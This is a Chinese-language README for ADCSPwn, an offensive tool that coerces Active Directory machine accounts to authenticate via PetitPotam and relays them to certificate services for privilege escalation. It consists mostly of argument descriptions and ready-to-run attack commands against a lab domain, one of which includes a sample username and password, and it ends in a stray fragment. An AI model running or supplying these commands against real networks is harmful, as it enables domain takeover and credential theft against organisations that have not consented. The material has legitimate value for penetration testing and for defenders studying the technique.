一种通过在活动目录网络中强制从机器账户进行身份验证(Petitpotam)并将其中继到证书服务以提升权限的工具。
在目标网络上运行 ADCSPwn。
Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik - TrustedSec
Contributor: @424f424f - Black Hills Information Security
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
必需参数:
adcs - 要进行身份验证中继的 AD CS 服务器地址。
可选参数:
secure - 对证书服务使用 HTTPS。
port - ADCSPwn 监听的端口。
remote - 触发身份验证的远程计算机。
username - 非域环境下的用户名。
password - 非域环境下的密码。
dc - 用于查询证书模板的域控制器(LDAP)。
unc - 为 EfsRpcOpenFileRaw (Petitpotam) 设置自定义 UNC 回调路径。
output - 存储 base64 生成的证书文件的输出路径。
使用示例:
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --secure
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share
EfsRpcOpenFileRaw。